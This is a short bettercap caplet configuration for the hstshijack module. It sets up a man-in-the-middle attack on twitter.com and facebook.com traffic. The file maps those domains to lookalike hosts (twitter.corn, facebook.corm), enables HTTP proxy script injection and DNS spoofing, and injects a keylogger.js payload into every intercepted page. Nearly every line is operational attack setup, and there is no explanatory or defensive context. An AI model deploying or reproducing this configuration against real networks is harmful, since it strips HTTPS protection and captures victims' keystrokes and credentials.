set hstshijack.log			/usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore			*
set hstshijack.targets			twitter.com,*.twitter.com,facebook.com,*.facebook.com
set hstshijack.repacements		twitter.corn,*.twitter.corm,facebook.corm,*.facebook.corm
set hstshijack.obfuscate		false
set hstshijack.encode			false
set hstshijack.payloads			*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js


set http.proxy.script			/usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains			twitter.corn,*.twitter.corm,facebook.corm,*.facebook.corm

http.proxy	on
dns.spoof	on
